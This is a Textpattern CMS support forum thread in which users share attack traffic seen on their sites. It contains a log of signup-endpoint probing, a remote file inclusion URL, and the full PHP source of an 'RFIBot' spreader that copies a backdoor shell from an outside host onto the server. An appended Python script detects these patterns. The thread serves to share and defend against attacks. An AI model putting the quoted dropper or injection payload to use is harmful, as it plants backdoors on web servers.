
Textpattern CMS support forum


#1 2012-10-29 05:22:27

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,090

Just to say I'm glad I am using txp

Here is part of my site’s log from last night (newer on top). The particular hacker first thought that we had a wp site and started from there. As the txp admin interface is not showing in the logs, I wonder if they ended up trying to actually log in.

/index.php?app=home&mod=public&act=register 	  	 
/index.php?app=home&mod=public&act=register 	  	 
/signup/ 	  	 
/tools/quicklogin.one 	  	 
/register.php 	  	 
/reg.asp 	  	 
/reg.asp 	  	 
/logging.php?action=login 	  	 
/index.php 	  	 
/register.php 	  	 
/login.php 	  	 
/login.php 	  	 
/login.php 	  	 
/login.php?action=quit 	  	 
/bokeindex.asp 	  	 
/Members.aspx 	  	 
/reg.asp 	  	 
/?T=reg 	  	 
/register.php 	  	 
/register.cgi 	  	 
/member/index_do.php?fmdo=user&dopost=regnew 	  	  	 
/register.aspx 	  	 
/member.php?mod=logging&action=login 	  	 
/member.php?mod=register 	  	 
/post.php 	  	 
/register.php?type=company 	  	 
/member/register.php?type=company 	  	 
/member.php/register.php?type=company 	  	 
/register.php?type=company 	  	 
/member/register.php?type=company 	  	 
/member.php/register.php?type=company 	  	 
/register.php 	  	 
/reg.php 	  	 
/login.php 	  	 
/CreateUser.asp 	  	 
/member/ 	  	 
/Class/Post.asp 	  	 
/reg.asp 	  	 
/login.php?part=register 	  	 
/User/Register.aspx 	  	 
/modules.php?app=user_reg 	  	 
/member.php?mod=logging&action=login 	  	 
/member.php?mod=register 	  	 
/CreateUser.asp 	  	 
/wp-signup.php 	  	 
/signup.php 	  	 
/index.php?do=/user/register/ 	  	 
/?do=%2Fuser%2Fregister%2F 	  	 
/index.php?page=en_Signup 	  	 
/signup.php 	  	 
/profile.php?mode=register&agreed=true&coppa=0 	  	 
/register.php 	  	 
/ucp.php?mode=register
/index.php?app=core&module=global&section=login 	  	 
/index.php?act=Login&CODE=00 	  	 
/signup.php 	  	 
/user/register 	  	 
/signup/ 	  	 
/account/register.php 	  	 
/index.php?action=register 	  	 
/join.php 	  	 
/blogs/load/recent 	  	 
/join.php 	  	 
/join_form.php 	  	 
/signup 	  	 
/signup 	  	 
/join.php 	  	 
/index.php?p=member/signup 	  	 
/signup.php 	  	 
/YaBB.cgi/ 	  	 
/YaBB.pl/ 	  	 
/member/register 	  	 
/register/ 	  	 
/signup.php 	  	 
/signup.php 	  	 
/index.php?site=register 	  	 
/?site=register 	  	 
/register.php 	  	 
/member/join.php
/index.php?page=blogs
/register/
/tiki-register.php 	  	 
/signup 	  	 
/?s=Register 	  	 
/Register/ 	  	 
/wp-login.php?action=register

Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.


#2 2012-10-29 16:11:13

etc
Developer
Registered: 2010-11-11
Posts: 5,192

Re: Just to say I'm glad I am using txp

Dear hackers, this sucks too: /?_SERVER[DOCUMENT_ROOT]=http://www.star-games.be/images/test.jpg?%0D?


#3 2012-10-29 21:32:13

etc
Developer
Registered: 2010-11-11
Posts: 5,192

Re: Just to say I'm glad I am using txp

Funny day, another guy is trying to feed me with

<html><style>
body {font:10pt tahoma;color:#ff0000;background:black;margin:4;font-weight:bold;}
</style><body>
<?php
###[ MQ SPREAD for RFIBot (2.3) ]###
error_reporting(0);
##### CONFIG #####
$mode = $_GET["mode"]; 

$url = 'http://bleury.fr/id/'; //URL path
$src = $url.'cmd'; //Source Shell
$shell = 'ini.php'; //Backdoor PHPShell name
$bot = $url.'bot'; //Source PHPBot

##### SPREAD #####
switch ($mode) {
case "bot":
include($bot);
break;
default:
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
if(file_exists($exec)){
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);}
if(!copy($src,$exec)){
die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal!
}
else {
echo base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Created!'; //encode biar lebih optimal!
}
break;
}
?>
</body></html>
<?php die(); ?>
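
Added example, not part of the thread and not Textpattern code: Python log triage that flags the two request patterns posted above, the sweep of signup/login endpoints from #1 and the superglobal-overwrite parameter carrying a remote URL from #2. The client addresses, the `payload.example` host, the regular expressions and the threshold of 5 are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Heuristic fragments of account-creation and login endpoints (assumed list).
ACCOUNT_RE = re.compile(r"regist|sign-?up|join|login|logging|createuser|\breg\b", re.I)
# Parameter names that try to overwrite PHP superglobals, e.g. _SERVER[DOCUMENT_ROOT].
SUPERGLOBAL_RE = re.compile(r"^(_SERVER|_GET|_POST|_COOKIE|_FILES|_ENV|_REQUEST|GLOBALS)(\[|$)")
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.I)  # parameter value is a remote URL

def classify(target):
    """Label one request target (path plus query string)."""
    parts, labels = urlsplit(target), set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            labels.add("superglobal-overwrite")
        if REMOTE_RE.match(value):
            labels.add("remote-url-param")
    if ACCOUNT_RE.search(unquote(parts.path + "?" + parts.query)):
        labels.add("account-probe")
    return labels

def triage(requests, sweep_threshold=5):
    """requests: iterable of (client, target) pairs -> {client: findings}."""
    probes, injections = defaultdict(set), defaultdict(list)
    for client, target in requests:
        labels = classify(target)
        if "account-probe" in labels:
            probes[client].add(target.lower().rstrip("/"))  # count distinct endpoints
        if labels & {"superglobal-overwrite", "remote-url-param"}:
            injections[client].append(target)
    return {
        client: {
            "distinct_account_endpoints": len(probes[client]),
            "signup_sweep": len(probes[client]) >= sweep_threshold,
            "injection_attempts": list(injections[client]),
        }
        for client in sorted(set(probes) | set(injections))
    }

# Constructed sample: the first client's paths are copied from post #1.
SAMPLE = [("203.0.113.7", p) for p in (
    "/wp-login.php?action=register", "/Register/", "/tiki-register.php",
    "/member/join.php", "/signup.php", "/signup.php", "/ucp.php?mode=register",
    "/index.php?page=blogs")] + [
    ("198.51.100.23", "/?_SERVER[DOCUMENT_ROOT]=http://payload.example/images/test.jpg?%0D?"),
    ("192.0.2.10", "/articles/"), ("192.0.2.10", "/login.php")]
if __name__ == "__main__":
    for client, finding in triage(SAMPLE).items():
        print(client, finding)
```

A single hit on `/login.php` stays below the threshold, so an ordinary visitor is listed but not flagged as a sweep; only the count of distinct account endpoints per client triggers it.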

